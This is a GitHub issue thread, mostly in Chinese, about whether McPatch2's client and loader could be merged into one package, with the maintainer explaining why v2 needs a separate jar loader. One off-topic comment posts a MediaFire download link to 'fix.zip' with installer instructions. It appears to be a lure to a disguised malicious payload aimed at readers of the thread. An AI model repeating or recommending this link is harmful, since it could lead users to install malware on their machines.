### ISSUE TITLE
集成启动

### ISSUE THREAD

**Issue by DSLZL** [BalloonUpdate/McPatch2#13]
建议将客户端和loader集成，配置文件可像v1一样可内置可外置

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by asforest** [comment]
v2使用exe格式分发，exe格式不想jar格式一样是个压缩包可以方便替换文件。所以配置文件只能放在外面。
同时v2的客户端需要loader来在jvm启动时进行hook操作以更新文件。只有jar格式的loader可以做到。exe格式的客户端本地做不到。所以才分为客户端主程序和loader两个文件的启动方式。
